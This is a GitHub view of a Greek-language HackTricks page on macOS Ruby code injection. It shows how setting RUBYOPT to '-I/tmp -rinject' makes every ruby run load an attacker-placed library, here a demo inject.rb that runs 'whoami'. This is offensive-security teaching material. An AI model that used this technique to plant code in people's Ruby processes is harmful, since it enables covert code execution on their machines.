Skip to content

Latest commit

 

History

History
57 lines (41 loc) · 4.54 KB

macos-ruby-applications-injection.md

File metadata and controls

57 lines (41 loc) · 4.54 KB
Raw

Εισαγωγή σε εφαρμογές Ruby στο macOS

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

RUBYOPT

Χρησιμοποιώντας αυτήν τη μεταβλητή περιβάλλοντος, είναι δυνατόν να προστεθούν νέες παράμετροι στο ruby κάθε φορά που εκτελείται. Αν και η παράμετρος -e δεν μπορεί να χρησιμοποιηθεί για να καθορίσει κώδικα ruby προς εκτέλεση, είναι δυνατόν να χρησιμοποιηθούν οι παράμετροι -I και -r για να προστεθεί ένας νέος φάκελος στη διαδρομή φόρτωσης των βιβλιοθηκών και στη συνέχεια να καθοριστεί μια βιβλιοθήκη για φόρτωση.

Δημιουργήστε τη βιβλιοθήκη inject.rb στο /tmp:

{% code title="inject.rb" %}

puts `whoami`

{% endcode %}

Δημιουργήστε οπουδήποτε ένα ruby script όπως:

{% code title="hello.rb" %}

puts 'Hello, World!'

{% endcode %}

Στη συνέχεια, δημιουργήστε ένα αυθαίρετο ruby script και φορτώστε το με:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Ενδιαφέρον γεγονός, λειτουργεί ακόμα και με την παράμετρο --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: